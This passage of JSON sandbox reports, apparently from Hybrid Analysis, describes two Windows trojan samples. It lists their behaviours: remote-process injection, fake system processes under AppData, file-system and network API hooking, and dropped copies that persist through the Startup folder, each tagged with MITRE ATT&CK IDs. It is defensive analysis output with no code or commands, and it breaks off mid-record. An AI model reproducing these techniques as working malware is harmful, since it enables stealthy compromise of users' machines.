\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"L:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"M:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"N:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"O:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"P:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"Q:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"R:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"S:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"T:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"U:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"V:\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" (UID: 00000000-00005884)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005856)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002060)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006136)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005952)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006124)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004180)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004284)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004136)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005984)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006048)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003928)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003800)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003456)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002208)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004316)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004036)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001800)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004204)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003820)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003256)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004152)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001720)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003424)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003924)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003416)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006080)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003920)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001416)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004188)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003888)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004392)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001688)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001884)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004060)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00000712)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002484)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000884)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003732)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002160)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002840)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001820)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003688)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001748)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001092)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002008)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002752)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003916)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002524)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002496)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002968)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003508)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 888)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 888)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 888)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 896)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 896)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 896)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 888)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 888)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 888)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 896)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 896)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 896)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" allocated memory in \"C:\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\"\n \"D3_08.exe\" allocated memory in \"%WINDIR%\\D3_08.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006124)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004284)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005984)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006048)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003928)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004084)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003800)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002208)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004316)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001800)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004204)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003820)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004152)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003232)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003424)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003924)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003416)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00006080)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003920)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001416)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003888)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001884)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004060)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000884)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003732)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002160)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001820)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003688)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001748)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001092)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002008)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002752)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003916)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002524)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002496)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002968)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003508)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004760)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003104)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001144)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"D3_08.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"D3_08.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f
https://hybrid-analysis.com/sample/afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f
Hybrid Analysis - Killers
{"size": 163903, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "av_detect": 94, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 134, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 163903, "sha256": "3b08311d9c7452f5eaa90c005244b6ec0abcd6c6fbee40b3b9d0d5d980c81845", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\CSRSS.EXE", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%LOCALAPPDATA%\\D3_08.exe", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%LOCALAPPDATA%\\IExplorer.exe", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\LSASS.EXE", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\SERVICES.EXE", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\SMSS.EXE", "file_size": 163903, "sha256": "afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 163903, "sha256": "3481755cc0f940287028bd66e13d6bf6eb56b20e3135513d38697c54fe80a647", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 163903, "sha256": "7332c21afa9d652abac9b8948adc54c11ad8c6654c31268052c2e512c5cc2381", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 163903, "sha256": "b7df88e81f8f3b5f9df18171e8145a9d05cae57e5d4564fb678a0af70652462c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": 